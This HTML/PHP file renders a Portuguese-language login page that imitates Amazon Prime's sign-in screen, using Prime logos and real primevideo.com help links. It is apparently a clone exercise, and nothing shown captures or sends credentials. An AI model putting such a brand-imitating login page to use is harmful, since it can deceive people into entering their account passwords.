<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="iconeprime.jpeg">
  <title>Acessar Amazon</title>
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      background-color: #ffffff;
    }

    .container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .form-box {
      background-color: #ffffff;
      max-width: 500px;
      width: 70%;
      padding: 20px;
      border: 2px solid #000000;
      display: flex;
      flex-direction: column;
      align-items: center;
      position: relative;
    }

    .form-box h3 {
      text-align: center;
      color: #000000;
      font-family: 'Courier New', Courier, monospace;
    }

    .form-box input[type="text"],
    .form-box input[type="password"] {
      width: 100%;
      height: 45px;
      border: 1px solid #ccc;
      padding-left: 10px;
      margin: 10px 0;
    }

    .form-box input[type="submit"] {
      width: 100%;
      height: 30px;
      cursor: pointer;
      background-color: orange;
      color: #000000;
      border: none;
    }

    .form-box .a-link-normal {
      display: block;
      margin-top: 10px;
      text-align: center;
    }

    .logo {
      position: absolute;
      top: -70px;
      left: 50%;
      transform: translateX(-50%);
    }
  </style>
</head>

<body>
  <?php
  if (isset($_GET['msg']) && $_GET['msg'] === 'success') {
    echo "Conta criada com sucesso!";
  }
  ?>
  <div class="container">
    <div class="form-box">
      <img src="loginprime.png" alt="Imagem de logo" class="logo">
      <h3>Fazer login</h3>
      <form action="amazonprime.html">
        <input type="text" name="email" placeholder="E-mail ou número de telefone celular">
        <input type="password" name="senha" placeholder="Sua senha">
        <input type="submit" name="acao" value="Fazer login">

        <a class="a-link-normal" target="_blank" rel="noopener"
          href="https://www.primevideo.com/help/ref=av_auth_hp">Ajuda</a>

        <a class="a-link-normal" target="_blank" rel="noopener"
          href="https://www.primevideo.com/ww-av-legal-home/ref=av_auth_ter">Termos e aviso de privacidade</a>
        <p>Novo na Amazon?</p>
        <input type="button" name="cadastre" value="Criar sua conta da Amazon"
          onclick="window.location.href='cadastroprime.html'">
      </form>
    </div>
  </div>
</body>

</html>
